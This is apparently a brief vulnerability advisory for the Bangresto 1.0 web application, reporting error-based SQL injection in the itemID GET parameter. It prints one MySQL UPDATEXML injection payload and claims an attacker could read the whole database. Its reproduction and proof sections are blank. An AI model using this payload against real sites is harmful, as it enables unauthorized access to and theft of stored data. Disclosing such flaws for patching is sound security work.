Bangresto-1.0
Vendor
Description:
The itemID parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database error message was returned.
The attacker can be stooling all information from the database of this application.
STATUS: CRITICAL Vulnerability
[+] Payload:
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT (ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---Reproduce:
Proof and Exploit:
Time spent
00:30:00
